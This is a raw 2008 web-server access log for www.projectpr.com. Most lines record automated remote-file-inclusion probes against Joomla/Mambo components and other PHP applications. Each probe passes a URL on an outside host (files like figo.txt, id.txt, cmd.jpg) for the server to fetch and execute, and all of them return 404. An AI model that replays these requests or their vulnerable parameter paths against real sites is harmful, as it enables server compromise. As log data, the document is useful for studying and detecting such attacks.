205.234.109.226 - - [12/Jan/2008:08:30:00 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:30:00 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:30:00 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.6.19.123 - - [12/Jan/2008:08:30:41 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
72.30.226.137 - - [12/Jan/2008:08:30:42 -0800] "GET /logs/access.log HTTP/1.0" 200 326040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:08:31:19 -0800] "GET /logs/access_070812.log/components/com_smf/smf.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.808" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:08:31:19 -0800] "GET /logs/components/com_smf/smf.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:08:32:18 -0800] "GET /logs/access_070712.log/components/com_smf/smf.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:08:34:12 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.90.77.43 - - [12/Jan/2008:08:34:42 -0800] "GET /logs/access.log//modify.php?dir_module=http://kamloopstutor.com/images/banners/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.90.77.43 - - [12/Jan/2008:08:34:42 -0800] "GET //modify.php?dir_module=http://kamloopstutor.com/images/banners/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.90.77.43 - - [12/Jan/2008:08:34:42 -0800] "GET /logs//modify.php?dir_module=http://kamloopstutor.com/images/banners/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.90.77.43 - - [12/Jan/2008:08:35:22 -0800] "GET //modify.php?dir_module=http://kamloopstutor.com/images/banners/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:35:53 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:35:53 -0800] "GET //skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:35:53 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:38:09 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:38:10 -0800] "GET //skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:38:10 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:41:09 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:41:09 -0800] "GET //skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:41:09 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:41:25 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:41:25 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:41:26 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:08:46:15 -0800] "GET /logs/access_070812.log//modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:08:46:16 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:48:38 -0800] "GET /logs/access_%3Cwbr%20/%3E070912.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:48:40 -0800] "GET /logs/access_%3Cwbr%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:08:49:51 -0800] "GET /logs/access_070812.log//modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:08:49:51 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.808" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:50:16 -0800] "GET /logs/access_%3Cwbr%20/%3E070912.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:50:17 -0800] "GET /logs/access_%3Cwbr%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 327 "-" "libwww-perl/5.805" "www.projectpr.com"
58.120.225.104 - - [12/Jan/2008:08:51:16 -0800] "GET /logs//index.php?option=http://www.3dtapestry.com/3DT/readme.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.projectpr.com"
70.85.19.68 - - [12/Jan/2008:08:52:56 -0800] "GET /logs/access.log/write.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
70.85.19.68 - - [12/Jan/2008:08:52:56 -0800] "GET /write.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
70.85.19.68 - - [12/Jan/2008:08:52:56 -0800] "GET /logs/write.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
146.83.144.170 - - [12/Jan/2008:08:53:48 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.fuori-corso.net/administration/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
146.83.144.170 - - [12/Jan/2008:08:53:48 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.fuori-corso.net/administration/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
146.83.144.170 - - [12/Jan/2008:08:53:53 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.fuori-corso.net/administration/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:08:54:43 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.179.218 - - [12/Jan/2008:09:01:06 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.geocities.com/mobileuser.13571325/CMD/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:09:02:36 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
62.193.248.95 - - [12/Jan/2008:09:03:27 -0800] "GET //components/com_flyspray/startdown.php?file=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
62.193.248.95 - - [12/Jan/2008:09:03:28 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:09:11:01 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:09:11:01 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.249.70.107 - - [12/Jan/2008:09:11:45 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
66.249.70.107 - - [12/Jan/2008:09:11:51 -0800] "GET /logs/access_071012.log HTTP/1.1" 200 2319125 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
147.210.86.38 - - [12/Jan/2008:09:14:05 -0800] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kluna.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
147.210.86.38 - - [12/Jan/2008:09:14:05 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kluna.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
147.210.86.38 - - [12/Jan/2008:09:14:05 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kluna.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
216.86.149.247 - - [12/Jan/2008:09:15:21 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.179.218 - - [12/Jan/2008:09:15:30 -0800] "GET /logs/access.log/components/com_simpleboard/file_upload.php?sbp=http://www.geocities.com/mobileuser.13571325/CMD/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.179.218 - - [12/Jan/2008:09:15:30 -0800] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.geocities.com/mobileuser.13571325/CMD/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
62.193.248.95 - - [12/Jan/2008:09:15:56 -0800] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.projectpr.com"
62.193.248.95 - - [12/Jan/2008:09:15:56 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.projectpr.com"
91.186.4.142 - - [12/Jan/2008:09:16:11 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
91.186.4.142 - - [12/Jan/2008:09:16:12 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
91.186.4.142 - - [12/Jan/2008:09:16:12 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt??? HTTP/1.1" 404 294 "-" "libwww-perl/5.808" "www.projectpr.com"
147.210.86.38 - - [12/Jan/2008:09:18:09 -0800] "GET /logs/access_070712.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kluna.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:09:22:44 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:09:22:44 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 311 "-" "libwww-perl/5.808" "www.projectpr.com"
70.86.187.2 - - [12/Jan/2008:09:22:54 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kluna.info/ferryc/id.txt? HTTP/1.1" 404 321 "-" "libwww-perl/5.808" "www.projectpr.com"
70.86.187.2 - - [12/Jan/2008:09:22:54 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kluna.info/ferryc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
70.86.187.2 - - [12/Jan/2008:09:22:54 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kluna.info/ferryc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
70.86.187.2 - - [12/Jan/2008:09:29:43 -0800] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kluna.info/ferryc/id.txt? HTTP/1.1" 404 328 "-" "libwww-perl/5.808" "www.projectpr.com"
70.85.19.68 - - [12/Jan/2008:09:33:52 -0800] "GET /logs/access.log/claroline/auth/lostPassword.php//ldap/authldap.php?includePath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
70.85.19.68 - - [12/Jan/2008:09:33:53 -0800] "GET /claroline/auth/lostPassword.php//ldap/authldap.php?includePath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.808" "www.projectpr.com"
70.85.19.68 - - [12/Jan/2008:09:33:53 -0800] "GET /logs/claroline/auth/lostPassword.php//ldap/authldap.php?includePath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.86.149.247 - - [12/Jan/2008:09:36:40 -0800] "GET /logs/access_070812.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.86.149.247 - - [12/Jan/2008:09:36:40 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.214.18.196 - - [12/Jan/2008:09:39:28 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.18.196 - - [12/Jan/2008:09:39:34 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.18.196 - - [12/Jan/2008:09:39:35 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.18.196 - - [12/Jan/2008:09:39:35 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
207.44.188.10 - - [12/Jan/2008:09:42:27 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.projectpr.com"
207.44.188.10 - - [12/Jan/2008:09:42:27 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.projectpr.com"
85.214.18.196 - - [12/Jan/2008:09:44:55 -0800] "GET /logs/access_070812.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
66.225.246.28 - - [12/Jan/2008:09:50:30 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.246.28 - - [12/Jan/2008:09:50:31 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.246.28 - - [12/Jan/2008:09:50:31 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.214.68.70 - - [12/Jan/2008:09:52:45 -0800] "GET //newspublish/index.php?path[docroot]=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
67.205.67.39 - - [12/Jan/2008:09:55:56 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.246.28 - - [12/Jan/2008:10:02:36 -0800] "GET /logs/access_070812.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
195.62.12.248 - - [12/Jan/2008:10:03:45 -0800] "GET /logs/access_070812.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 316 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [12/Jan/2008:10:03:45 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 293 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [12/Jan/2008:10:03:45 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 298 "-" "libwww-perl/5.803" "www.projectpr.com"
146.83.144.170 - - [12/Jan/2008:10:05:11 -0800] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.fuori-corso.net/administration/safe.txt??? HTTP/1.1" 404 308 "-" "libwww-perl/5.805" "www.projectpr.com"
67.205.67.39 - - [12/Jan/2008:10:06:02 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.205.67.39 - - [12/Jan/2008:10:06:02 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
195.62.12.248 - - [12/Jan/2008:10:09:30 -0800] "GET /logs/access_070812.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [12/Jan/2008:10:09:30 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [12/Jan/2008:10:09:30 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.216.24 - - [12/Jan/2008:10:11:31 -0800] "GET /inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.netmeup.ro/components/.../test.txt????? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.projectpr.com"
62.193.216.24 - - [12/Jan/2008:10:11:31 -0800] "GET /logs/inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.netmeup.ro/components/.../test.txt????? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.projectpr.com"
70.85.19.68 - - [12/Jan/2008:10:12:10 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
70.85.19.68 - - [12/Jan/2008:10:12:10 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
70.85.19.68 - - [12/Jan/2008:10:12:10 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
90.156.145.60 - - [12/Jan/2008:10:12:50 -0800] "GET /logs/access.log//index.php?pagina=http://collegejacquesprevert.ca/eleves/.plugins/id.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
